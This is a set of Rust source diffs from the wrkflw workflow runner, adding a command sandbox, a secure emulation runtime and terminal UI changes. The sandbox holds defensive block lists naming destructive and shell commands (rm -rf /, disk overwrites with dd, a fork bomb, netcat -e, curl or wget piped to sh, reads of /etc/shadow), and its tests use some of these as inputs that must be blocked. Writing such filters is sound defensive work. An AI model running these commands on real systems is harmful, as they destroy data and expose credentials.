.iter()
.any(|allowed| abs_path.starts_with(allowed))
|| self
.config
.allowed_write_paths
.iter()
.any(|allowed| abs_path.starts_with(allowed))
}
}
/// Check if an environment variable is safe to pass through
fn is_env_var_safe(&self, key: &str) -> bool {
// Block dangerous environment variables
let dangerous_env_vars = [
"LD_PRELOAD",
"LD_LIBRARY_PATH",
"DYLD_INSERT_LIBRARIES",
"DYLD_LIBRARY_PATH",
"PATH",
"HOME",
"SHELL",
];
!dangerous_env_vars.contains(&key)
}
/// Check if a file should be skipped during copying
fn should_skip_file(&self, filename: &str) -> bool {
let dangerous_files = [
".ssh",
".gnupg",
".aws",
".docker",
"id_rsa",
"id_ed25519",
"credentials",
"config",
".env",
".secrets",
];
dangerous_files
.iter()
.any(|pattern| filename.contains(pattern))
|| filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
}
/// Check if a directory should be skipped
fn should_skip_directory(&self, dirname: &str) -> bool {
let skip_dirs = [
"target",
"node_modules",
".git",
".cargo",
".npm",
".cache",
"build",
"dist",
"tmp",
"temp",
];
skip_dirs.contains(&dirname)
}
/// Compile regex patterns for dangerous command detection
fn compile_dangerous_patterns() -> Vec<Regex> {
let patterns = [
r"rm\s+.*-rf?\s*/", // rm -rf /
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
r">\s*/dev/sd[a-z]", // > /dev/sda
r"mkfs\.", // mkfs.ext4, etc.
r"fdisk\s+/dev/", // fdisk /dev/...
r"mount\s+.*\s+/", // mount ... /
r"chroot\s+/", // chroot /
r"sudo\s+", // sudo commands
r"su\s+", // su commands
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
r":\(\)\{.*;\};:", // Fork bomb
r"/proc/sys/", // /proc/sys access
r"/etc/passwd", // /etc/passwd access
r"/etc/shadow", // /etc/shadow access
r"nc\s+.*-e", // netcat with exec
r"wget\s+.*\|\s*sh", // wget ... | sh
r"curl\s+.*\|\s*sh", // curl ... | sh
];
patterns
.iter()
.filter_map(|pattern| {
Regex::new(pattern)
.map_err(|e| {
wrkflw_logging::warning(&format!(
"Invalid regex pattern {}: {}",
pattern, e
));
e
})
.ok()
})
.collect()
}
}
/// Create a default sandbox configuration for CI/CD workflows
pub fn create_workflow_sandbox_config() -> SandboxConfig {
let mut allowed_read_paths = HashSet::new();
allowed_read_paths.insert(PathBuf::from("."));
let mut allowed_write_paths = HashSet::new();
allowed_write_paths.insert(PathBuf::from("."));
SandboxConfig {
max_execution_time: Duration::from_secs(1800), // 30 minutes
max_memory_mb: 2048, // 2GB
max_processes: 50,
allow_network: true,
strict_mode: false,
allowed_read_paths,
allowed_write_paths,
..Default::default()
}
}
/// Create a strict sandbox configuration for untrusted code
pub fn create_strict_sandbox_config() -> SandboxConfig {
let mut allowed_read_paths = HashSet::new();
allowed_read_paths.insert(PathBuf::from("."));
let mut allowed_write_paths = HashSet::new();
allowed_write_paths.insert(PathBuf::from("."));
// Very limited command set
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
.iter()
.map(|s| s.to_string())
.collect();
SandboxConfig {
max_execution_time: Duration::from_secs(60), // 1 minute
max_memory_mb: 128, // 128MB
max_processes: 5,
allow_network: false,
strict_mode: true,
allowed_read_paths,
allowed_write_paths,
allowed_commands,
..Default::default()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_dangerous_pattern_detection() {
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
// Should block dangerous commands
assert!(sandbox.validate_command("rm -rf /").is_err());
assert!(sandbox
.validate_command("dd if=/dev/zero of=/dev/sda")
.is_err());
assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());
// Should allow safe commands
assert!(sandbox.validate_command("echo hello").is_ok());
assert!(sandbox.validate_command("ls -la").is_ok());
assert!(sandbox.validate_command("cargo build").is_ok());
}
#[test]
fn test_command_whitelist() {
let config = create_strict_sandbox_config();
let sandbox = Sandbox::new(config).unwrap();
// Should allow whitelisted commands
assert!(sandbox.validate_command("echo hello").is_ok());
assert!(sandbox.validate_command("ls").is_ok());
// Should block non-whitelisted commands
assert!(sandbox.validate_command("git clone").is_err());
assert!(sandbox.validate_command("cargo build").is_err());
}
#[test]
fn test_file_filtering() {
let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();
// Should skip dangerous files
assert!(sandbox.should_skip_file("id_rsa"));
assert!(sandbox.should_skip_file(".ssh"));
assert!(sandbox.should_skip_file("credentials"));
// Should allow safe files
assert!(!sandbox.should_skip_file("Cargo.toml"));
assert!(!sandbox.should_skip_file("README.md"));
assert!(!sandbox.should_skip_file(".gitignore"));
}
}
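The tests above show the two layers of `validate_command`: a dangerous-pattern scan and, in strict mode, a whitelist of allowed programs. As a standalone illustration of that shape — independent of the wrkflw crates, with an assumed pattern list that only loosely mirrors the tests, not the crate's actual internals — a minimal sketch might look like:

```rust
use std::collections::HashSet;

// Hypothetical, simplified stand-in for Sandbox::validate_command:
// reject known-dangerous substrings, then enforce a program whitelist.
fn validate_command(cmd: &str, allowed: &HashSet<&str>) -> Result<(), String> {
    // Assumed patterns for illustration; the real sandbox's list is larger.
    const DANGEROUS: &[&str] = &["rm -rf /", "of=/dev/", "sudo "];
    if let Some(p) = DANGEROUS.iter().find(|p| cmd.contains(**p)) {
        return Err(format!("dangerous pattern: {}", p));
    }
    let program = cmd.split_whitespace().next().unwrap_or("");
    if !allowed.is_empty() && !allowed.contains(program) {
        return Err(format!("command not whitelisted: {}", program));
    }
    Ok(())
}

fn main() {
    // Same whitelist as create_strict_sandbox_config above.
    let allowed: HashSet<&str> = ["echo", "cat", "ls", "pwd", "date"].into_iter().collect();
    assert!(validate_command("echo hello", &allowed).is_ok());
    assert!(validate_command("rm -rf /", &allowed).is_err()); // dangerous pattern
    assert!(validate_command("cargo build", &allowed).is_err()); // not whitelisted
    println!("ok");
}
```

Running the dangerous-pattern check first means `sudo rm -rf /home` is rejected even when `sudo` happens to be whitelisted.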


@@ -0,0 +1,339 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
use async_trait::async_trait;
use std::path::Path;
use wrkflw_logging;
/// Secure emulation runtime that uses sandboxing for safety
pub struct SecureEmulationRuntime {
sandbox: Sandbox,
}
impl Default for SecureEmulationRuntime {
fn default() -> Self {
Self::new()
}
}
impl SecureEmulationRuntime {
/// Create a new secure emulation runtime with default workflow-friendly configuration
pub fn new() -> Self {
let config = create_workflow_sandbox_config();
let sandbox = Sandbox::new(config).expect("Failed to create sandbox");
wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");
Self { sandbox }
}
/// Create a new secure emulation runtime with custom sandbox configuration
pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
let sandbox = Sandbox::new(config).map_err(|e| {
ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
})?;
wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");
Ok(Self { sandbox })
}
}
#[async_trait]
impl ContainerRuntime for SecureEmulationRuntime {
async fn run_container(
&self,
image: &str,
command: &[&str],
env_vars: &[(&str, &str)],
working_dir: &Path,
_volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Executing sandboxed command: {} (image: {})",
command.join(" "),
image
));
// Use sandbox to execute the command safely
let result = self
.sandbox
.execute_command(command, env_vars, working_dir)
.await;
match result {
Ok(output) => {
wrkflw_logging::info("✅ Sandboxed command completed successfully");
Ok(output)
}
Err(SandboxError::BlockedCommand { command }) => {
let error_msg = format!(
"🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
This command was blocked for security reasons. \
If you need to run this command, please use Docker or Podman mode instead.",
command
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::DangerousPattern { pattern }) => {
let error_msg = format!(
"🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
This command was blocked because it matches a known dangerous pattern. \
Please review your workflow for potentially harmful commands.",
pattern
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::ExecutionTimeout { seconds }) => {
let error_msg = format!(
"⏰ Command execution timed out after {} seconds. \
Consider optimizing your command or increasing timeout limits.",
seconds
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::PathAccessDenied { path }) => {
let error_msg = format!(
"🚫 Path access denied: '{}'. \
The sandbox restricts file system access for security.",
path
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(SandboxError::ResourceLimitExceeded { resource }) => {
let error_msg = format!(
"📊 Resource limit exceeded: {}. \
Your command used too many system resources.",
resource
);
wrkflw_logging::warning(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
Err(e) => {
let error_msg = format!("Sandbox execution failed: {}", e);
wrkflw_logging::error(&error_msg);
Err(ContainerError::ContainerExecution(error_msg))
}
}
}
async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Secure emulation: Pretending to pull image {}",
image
));
Ok(())
}
async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
wrkflw_logging::info(&format!(
"🔒 Secure emulation: Pretending to build image {} from {}",
tag,
dockerfile.display()
));
Ok(())
}
async fn prepare_language_environment(
&self,
language: &str,
version: Option<&str>,
_additional_packages: Option<Vec<String>>,
) -> Result<String, ContainerError> {
// For secure emulation runtime, we'll use a simplified approach
// that doesn't require building custom images
let base_image = match language {
"python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
"node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
"java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
format!("eclipse-temurin:{}", v)
}),
"go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
"dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
format!("mcr.microsoft.com/dotnet/sdk:{}", v)
}),
"rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
_ => {
return Err(ContainerError::ContainerStart(format!(
"Unsupported language: {}",
language
)))
}
};
// For emulation, we'll just return the base image
// The actual package installation will be handled during container execution
Ok(base_image)
}
}
/// Handle special actions in secure emulation mode
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
// Extract the action name and version from the action reference
let action_parts: Vec<&str> = action.split('@').collect();
let action_name = action_parts[0];
let action_version = if action_parts.len() > 1 {
action_parts[1]
} else {
"latest"
};
wrkflw_logging::info(&format!(
"🔒 Processing action in secure mode: {} @ {}",
action_name, action_version
));
// In secure mode, we're more restrictive about what actions we allow
match action_name {
// Core GitHub actions that are generally safe
name if name.starts_with("actions/checkout") => {
wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
}
name if name.starts_with("actions/setup-node") => {
wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
check_command_available_secure("node", "Node.js", "https://nodejs.org/");
}
name if name.starts_with("actions/setup-python") => {
wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
}
name if name.starts_with("actions/setup-java") => {
wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
check_command_available_secure("java", "Java", "https://adoptium.net/");
}
name if name.starts_with("actions/cache") => {
wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
}
// Rust-specific actions
name if name.starts_with("actions-rs/cargo") => {
wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
}
name if name.starts_with("actions-rs/toolchain") => {
wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
}
name if name.starts_with("actions-rs/fmt") => {
wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
}
// Potentially dangerous actions that we warn about
name if name.contains("docker") || name.contains("container") => {
wrkflw_logging::warning(&format!(
"🚫 Docker/container action '{}' is not supported in secure emulation mode. \
Use Docker or Podman mode for container actions.",
action_name
));
}
name if name.contains("ssh") || name.contains("deploy") => {
wrkflw_logging::warning(&format!(
"🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
Use Docker or Podman mode for deployment actions.",
action_name
));
}
// Unknown actions
_ => {
wrkflw_logging::warning(&format!(
"🟡 Unknown action '{}' in secure emulation mode. \
Some functionality may be limited or unavailable.",
action_name
));
}
}
Ok(())
}
/// Check if a command is available, with security-focused messaging
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
use std::process::Command;
let is_available = Command::new("which")
.arg(command)
.output()
.map(|output| output.status.success())
.unwrap_or(false);
if !is_available {
wrkflw_logging::warning(&format!(
"🔧 {} is required but not found on the system",
name
));
wrkflw_logging::info(&format!(
"To use this action in secure mode, please install {}: {}",
name, install_url
));
wrkflw_logging::info(&format!(
"Alternatively, use Docker or Podman mode for automatic {} installation",
name
));
} else {
// Try to get version information
if let Ok(output) = Command::new(command).arg("--version").output() {
if output.status.success() {
let version = String::from_utf8_lossy(&output.stdout);
wrkflw_logging::info(&format!(
"✅ Using system {} in secure mode: {}",
name,
version.trim()
));
}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sandbox::create_strict_sandbox_config;
use std::path::PathBuf;
#[tokio::test]
async fn test_secure_emulation_blocks_dangerous_commands() {
let config = create_strict_sandbox_config();
let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();
// Should block dangerous commands
let result = runtime
.run_container(
"alpine:latest",
&["rm", "-rf", "/"],
&[],
&PathBuf::from("."),
&[],
)
.await;
assert!(result.is_err());
let error_msg = result.unwrap_err().to_string();
assert!(error_msg.contains("SECURITY BLOCK"));
}
#[tokio::test]
async fn test_secure_emulation_allows_safe_commands() {
let runtime = SecureEmulationRuntime::new();
// Should allow safe commands
let result = runtime
.run_container(
"alpine:latest",
&["echo", "hello world"],
&[],
&PathBuf::from("."),
&[],
)
.await;
assert!(result.is_ok());
let output = result.unwrap();
assert!(output.stdout.contains("hello world"));
assert_eq!(output.exit_code, 0);
}
}
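`handle_special_action_secure` above splits the `uses:` reference on `@` and defaults the version to `latest`. That parsing step on its own can be sketched with the standard library (function name is illustrative, not the crate's API; `split_once` differs from the original's `split` only for references containing more than one `@`):

```rust
// Split an action reference like "actions/checkout@v4" into (name, version),
// defaulting the version to "latest" when no '@' is present.
fn parse_action(action: &str) -> (&str, &str) {
    match action.split_once('@') {
        Some((name, version)) => (name, version),
        None => (action, "latest"),
    }
}

fn main() {
    assert_eq!(parse_action("actions/checkout@v4"), ("actions/checkout", "v4"));
    assert_eq!(parse_action("actions/cache"), ("actions/cache", "latest"));
    println!("ok");
}
```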


@@ -1,18 +1,23 @@
[package]
name = "ui"
name = "wrkflw-ui"
version.workspace = true
edition.workspace = true
description = "user interface functionality for wrkflw"
description = "Terminal user interface for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
evaluator = { path = "../evaluator" }
executor = { path = "../executor" }
logging = { path = "../logging" }
utils = { path = "../utils" }
github = { path = "../github" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
wrkflw-executor = { path = "../executor", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
wrkflw-github = { path = "../github", version = "0.7.0" }
# External dependencies
chrono.workspace = true

crates/ui/README.md

@@ -0,0 +1,23 @@
## wrkflw-ui
Terminal user interface for browsing workflows, running them, and viewing logs.
- Tabs: Workflows, Execution, Logs, Help
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
- Integrates with `wrkflw-executor` and `wrkflw-logging`
### Example
```rust
use std::path::PathBuf;
use wrkflw_executor::RuntimeType;
use wrkflw_ui::run_wrkflw_tui;
# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.


@@ -11,12 +11,12 @@ use crossterm::{
execute,
terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
};
use executor::RuntimeType;
use ratatui::{backend::CrosstermBackend, Terminal};
use std::io::{self, stdout};
use std::path::PathBuf;
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::RuntimeType;
pub use state::App;
@@ -50,7 +50,7 @@ pub async fn run_wrkflw_tui(
if app.validation_mode {
app.logs.push("Starting in validation mode".to_string());
logging::info("Starting in validation mode");
wrkflw_logging::info("Starting in validation mode");
}
// Load workflows
@@ -108,13 +108,13 @@ pub async fn run_wrkflw_tui(
Ok(_) => Ok(()),
Err(e) => {
// If the TUI fails to initialize or crashes, fall back to CLI mode
logging::error(&format!("Failed to start UI: {}", e));
wrkflw_logging::error(&format!("Failed to start UI: {}", e));
// Only for 'tui' command should we fall back to CLI mode for files
// For other commands, return the error
if let Some(path) = path {
if path.is_file() {
logging::error("Falling back to CLI mode...");
wrkflw_logging::error("Falling back to CLI mode...");
crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
.await
} else if path.is_dir() {
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
if last_tick.elapsed() >= tick_rate {
app.tick();
app.update_running_workflow_progress();
// Check for log processing updates (includes system log change detection)
app.check_log_processing_updates();
// Request log processing if needed
if app.logs_need_update {
app.request_log_processing_update();
}
last_tick = Instant::now();
}
@@ -180,6 +189,25 @@ fn run_tui_event_loop(
continue;
}
// Handle help overlay scrolling
if app.show_help {
match key.code {
KeyCode::Up | KeyCode::Char('k') => {
app.scroll_help_up();
continue;
}
KeyCode::Down | KeyCode::Char('j') => {
app.scroll_help_down();
continue;
}
KeyCode::Esc | KeyCode::Char('?') => {
app.show_help = false;
continue;
}
_ => {}
}
}
match key.code {
KeyCode::Char('q') => {
// Exit and clean up
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
} else {
app.scroll_logs_up();
}
} else if app.selected_tab == 3 {
app.scroll_help_up();
} else if app.selected_tab == 0 {
app.previous_workflow();
} else if app.selected_tab == 1 {
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
} else {
app.scroll_logs_down();
}
} else if app.selected_tab == 3 {
app.scroll_help_down();
} else if app.selected_tab == 0 {
app.next_workflow();
} else if app.selected_tab == 1 {
@@ -273,7 +305,7 @@ fn run_tui_event_loop(
"[{}] DEBUG: Shift+r detected - this should be uppercase R",
timestamp
));
logging::info(
wrkflw_logging::info(
"Shift+r detected as lowercase - this should be uppercase R",
);
@@ -329,7 +361,7 @@ fn run_tui_event_loop(
"[{}] DEBUG: Reset key 'Shift+R' pressed",
timestamp
));
logging::info("Reset key 'Shift+R' pressed");
wrkflw_logging::info("Reset key 'Shift+R' pressed");
if !app.running {
// Reset workflow status
@@ -367,7 +399,7 @@ fn run_tui_event_loop(
"Workflow '{}' is already running",
workflow.name
));
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Workflow '{}' is already running",
workflow.name
));
@@ -408,7 +440,7 @@ fn run_tui_event_loop(
));
}
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Cannot trigger workflow in {} state",
status_text
));
@@ -416,20 +448,22 @@ fn run_tui_event_loop(
}
} else {
app.logs.push("No workflow selected to trigger".to_string());
logging::warning("No workflow selected to trigger");
wrkflw_logging::warning("No workflow selected to trigger");
}
} else if app.running {
app.logs.push(
"Cannot trigger workflow while another operation is in progress"
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Cannot trigger workflow while another operation is in progress",
);
} else if app.selected_tab != 0 {
app.logs
.push("Switch to Workflows tab to trigger a workflow".to_string());
logging::warning("Switch to Workflows tab to trigger a workflow");
wrkflw_logging::warning(
"Switch to Workflows tab to trigger a workflow",
);
// For better UX, automatically switch to the Workflows tab
app.switch_tab(0);
}

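The help-scroll handling in the hunks above is a clamped counter: `scroll_help_up` saturates at zero and `scroll_help_down` caps at a maximum. Isolated from the App state, the pattern looks like this sketch (struct and field names are illustrative):

```rust
// Clamped scroll position: saturating decrement, capped increment.
struct HelpScroll {
    pos: usize,
    max: usize, // highest reachable position, e.g. content lines minus viewport height
}

impl HelpScroll {
    fn up(&mut self) {
        self.pos = self.pos.saturating_sub(1);
    }
    fn down(&mut self) {
        self.pos = (self.pos + 1).min(self.max);
    }
}

fn main() {
    let mut s = HelpScroll { pos: 0, max: 30 };
    s.up(); // already at the top, stays at 0
    assert_eq!(s.pos, 0);
    for _ in 0..40 {
        s.down(); // capped at max
    }
    assert_eq!(s.pos, 30);
    println!("ok");
}
```

Using `saturating_sub` avoids the underflow panic a plain `pos - 1` would hit at the top of the content.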

@@ -1,14 +1,15 @@
// App state for the UI
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
use crate::models::{
ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
WorkflowStatus,
};
use chrono::Local;
use crossterm::event::KeyCode;
use executor::{JobStatus, RuntimeType, StepStatus};
use ratatui::widgets::{ListState, TableState};
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::{JobStatus, RuntimeType, StepStatus};
/// Application state
pub struct App {
@@ -40,6 +41,15 @@ pub struct App {
pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
pub log_search_matches: Vec<usize>, // Indices of logs that match the search
pub log_search_match_idx: usize, // Current match index for navigation
// Help tab scrolling
pub help_scroll: usize, // Scrolling position for help content
// Background log processing
pub log_processor: LogProcessor,
pub processed_logs: Vec<ProcessedLogEntry>,
pub logs_need_update: bool, // Flag to trigger log processing
pub last_system_logs_count: usize, // Track system log changes
}
impl App {
@@ -69,8 +79,10 @@ impl App {
// Use a very short timeout to prevent blocking the UI
let result = std::thread::scope(|s| {
let handle = s.spawn(|| {
utils::fd::with_stderr_to_null(executor::docker::is_available)
.unwrap_or(false)
wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::docker::is_available,
)
.unwrap_or(false)
});
// Set a short timeout for the thread
@@ -85,7 +97,7 @@ impl App {
}
// If we reach here, the check took too long
logging::warning(
wrkflw_logging::warning(
"Docker availability check timed out, falling back to emulation mode",
);
false
@@ -94,7 +106,7 @@ impl App {
}) {
Ok(result) => result,
Err(_) => {
logging::warning("Docker availability check failed with panic, falling back to emulation mode");
wrkflw_logging::warning("Docker availability check failed with panic, falling back to emulation mode");
false
}
};
@@ -104,12 +116,12 @@ impl App {
"Docker is not available or unresponsive. Using emulation mode instead."
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Docker is not available or unresponsive. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
logging::info("Docker is available, using Docker runtime");
wrkflw_logging::info("Docker is available, using Docker runtime");
RuntimeType::Docker
}
}
@@ -119,8 +131,10 @@ impl App {
// Use a very short timeout to prevent blocking the UI
let result = std::thread::scope(|s| {
let handle = s.spawn(|| {
utils::fd::with_stderr_to_null(executor::podman::is_available)
.unwrap_or(false)
wrkflw_utils::fd::with_stderr_to_null(
wrkflw_executor::podman::is_available,
)
.unwrap_or(false)
});
// Set a short timeout for the thread
@@ -135,7 +149,7 @@ impl App {
}
// If we reach here, the check took too long
logging::warning(
wrkflw_logging::warning(
"Podman availability check timed out, falling back to emulation mode",
);
false
@@ -144,7 +158,7 @@ impl App {
}) {
Ok(result) => result,
Err(_) => {
logging::warning("Podman availability check failed with panic, falling back to emulation mode");
wrkflw_logging::warning("Podman availability check failed with panic, falling back to emulation mode");
false
}
};
@@ -154,16 +168,17 @@ impl App {
"Podman is not available or unresponsive. Using emulation mode instead."
.to_string(),
);
logging::warning(
wrkflw_logging::warning(
"Podman is not available or unresponsive. Using emulation mode instead.",
);
RuntimeType::Emulation
} else {
logging::info("Podman is available, using Podman runtime");
wrkflw_logging::info("Podman is available, using Podman runtime");
RuntimeType::Podman
}
}
RuntimeType::Emulation => RuntimeType::Emulation,
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
};
App {
@@ -195,6 +210,13 @@ impl App {
log_filter_level: Some(LogFilterLevel::All),
log_search_matches: Vec::new(),
log_search_match_idx: 0,
help_scroll: 0,
// Background log processing
log_processor: LogProcessor::new(),
processed_logs: Vec::new(),
logs_need_update: true,
last_system_logs_count: 0,
}
}
@@ -210,7 +232,8 @@ impl App {
pub fn toggle_emulation_mode(&mut self) {
self.runtime_type = match self.runtime_type {
RuntimeType::Docker => RuntimeType::Podman,
RuntimeType::Podman => RuntimeType::Emulation,
RuntimeType::Podman => RuntimeType::SecureEmulation,
RuntimeType::SecureEmulation => RuntimeType::Emulation,
RuntimeType::Emulation => RuntimeType::Docker,
};
self.logs
@@ -227,14 +250,15 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Switched to {} mode", timestamp, mode));
logging::info(&format!("Switched to {} mode", mode));
wrkflw_logging::info(&format!("Switched to {} mode", mode));
}
pub fn runtime_type_name(&self) -> &str {
match self.runtime_type {
RuntimeType::Docker => "Docker",
RuntimeType::Podman => "Podman",
RuntimeType::Emulation => "Emulation",
RuntimeType::SecureEmulation => "Secure Emulation",
RuntimeType::Emulation => "Emulation (Unsafe)",
}
}
@@ -425,10 +449,9 @@ impl App {
if let Some(idx) = self.workflow_list_state.selected() {
if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
self.execution_queue.push(idx);
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs.push(format!(
"[{}] Added '{}' to execution queue. Press 'Enter' to start.",
timestamp, self.workflows[idx].name
self.add_timestamped_log(&format!(
"Added '{}' to execution queue. Press 'Enter' to start.",
self.workflows[idx].name
));
}
}
@@ -445,7 +468,7 @@ impl App {
let timestamp = Local::now().format("%H:%M:%S").to_string();
self.logs
.push(format!("[{}] Starting workflow execution...", timestamp));
logging::info("Starting workflow execution...");
wrkflw_logging::info("Starting workflow execution...");
}
}
@@ -453,7 +476,7 @@ impl App {
pub fn process_execution_result(
&mut self,
workflow_idx: usize,
result: Result<(Vec<executor::JobResult>, ()), String>,
result: Result<(Vec<wrkflw_executor::JobResult>, ()), String>,
) {
if workflow_idx >= self.workflows.len() {
let timestamp = Local::now().format("%H:%M:%S").to_string();
@@ -461,7 +484,7 @@ impl App {
"[{}] Error: Invalid workflow index received",
timestamp
));
logging::error("Invalid workflow index received in process_execution_result");
wrkflw_logging::error("Invalid workflow index received in process_execution_result");
return;
}
@@ -490,15 +513,15 @@ impl App {
.push(format!("[{}] Operation completed successfully.", timestamp));
execution_details.progress = 1.0;
// Convert executor::JobResult to our JobExecution struct
// Convert wrkflw_executor::JobResult to our JobExecution struct
execution_details.jobs = jobs
.iter()
.map(|job_result| JobExecution {
name: job_result.name.clone(),
status: match job_result.status {
executor::JobStatus::Success => JobStatus::Success,
executor::JobStatus::Failure => JobStatus::Failure,
executor::JobStatus::Skipped => JobStatus::Skipped,
wrkflw_executor::JobStatus::Success => JobStatus::Success,
wrkflw_executor::JobStatus::Failure => JobStatus::Failure,
wrkflw_executor::JobStatus::Skipped => JobStatus::Skipped,
},
steps: job_result
.steps
@@ -506,9 +529,9 @@ impl App {
.map(|step_result| StepExecution {
name: step_result.name.clone(),
status: match step_result.status {
executor::StepStatus::Success => StepStatus::Success,
executor::StepStatus::Failure => StepStatus::Failure,
executor::StepStatus::Skipped => StepStatus::Skipped,
wrkflw_executor::StepStatus::Success => StepStatus::Success,
wrkflw_executor::StepStatus::Failure => StepStatus::Failure,
wrkflw_executor::StepStatus::Skipped => StepStatus::Skipped,
},
output: step_result.output.clone(),
})
@@ -547,7 +570,7 @@ impl App {
"[{}] Workflow '{}' completed successfully!",
timestamp, workflow.name
));
logging::info(&format!(
wrkflw_logging::info(&format!(
"[{}] Workflow '{}' completed successfully!",
timestamp, workflow.name
));
@@ -559,7 +582,7 @@ impl App {
"[{}] Workflow '{}' failed: {}",
timestamp, workflow.name, e
));
logging::error(&format!(
wrkflw_logging::error(&format!(
"[{}] Workflow '{}' failed: {}",
timestamp, workflow.name, e
));
@@ -585,7 +608,7 @@ impl App {
self.current_execution = Some(next);
self.logs
.push(format!("Executing workflow: {}", self.workflows[next].name));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Executing workflow: {}",
self.workflows[next].name
));
@@ -631,10 +654,11 @@ impl App {
self.log_search_active = false;
self.log_search_query.clear();
self.log_search_matches.clear();
self.mark_logs_for_update();
}
KeyCode::Backspace => {
self.log_search_query.pop();
self.update_log_search_matches();
self.mark_logs_for_update();
}
KeyCode::Enter => {
self.log_search_active = false;
@@ -642,7 +666,7 @@ impl App {
}
KeyCode::Char(c) => {
self.log_search_query.push(c);
self.update_log_search_matches();
self.mark_logs_for_update();
}
_ => {}
}
@@ -654,8 +678,8 @@ impl App {
if !self.log_search_active {
// Don't clear the query, this allows toggling the search UI while keeping the filter
} else {
// When activating search, update matches
self.update_log_search_matches();
// When activating search, trigger update
self.mark_logs_for_update();
}
}
@@ -666,8 +690,8 @@ impl App {
